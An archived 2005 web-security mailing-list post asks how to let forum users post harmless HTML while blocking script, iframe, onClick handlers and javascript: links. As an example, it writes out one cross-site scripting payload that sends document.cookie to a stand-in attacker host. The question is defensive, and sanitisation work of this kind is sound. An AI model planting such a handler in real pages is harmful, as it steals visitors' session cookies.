[WEB SECURITY] magic_quotes

Pablo Fernández newsclient at teamq.info
Fri Jun 24 10:28:34 EDT 2005


Hi people

Do you happen to know of any library like the PHP Filter one but that is
able to strip *certain* HTML entities, i.e., I have a forum, people can
post using an WYSIWYG, so I want to allow stuff like <b> <i> <u> but I
really don't want to allow <iframe> <script>.

It just pop to my head how does stable boards handle stuff like
onClick=""? I mean, do the manage <a href="#"
onClick="self.location.href='http://cookiestealer.dude/?'+document.cookie;"> and what about <a href="javascript:...."> ???

Ok, if you are aware of something like this, please, drop me a line

Thanks!

Best regards,
Pablo

-------------- next part --------------
An embedded message was scrubbed...
From: Dave King <davefd at davewking.com>
Subject: Re: [WEB SECURITY] magic_quotes
Date: Tue, 21 Jun 2005 16:27:49 -0600
Size: 4817
URL: <http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/attachments/20050624/371fc3d6/attachment.mht>
-------------- next part --------------
---------------------------------------------------------------------
The Web Security Mailing List
http://www.webappsec.org/lists/websecurity/

The Web Security Mailing List Archives
http://www.webappsec.org/lists/websecurity/archive/


More information about the websecurity mailing list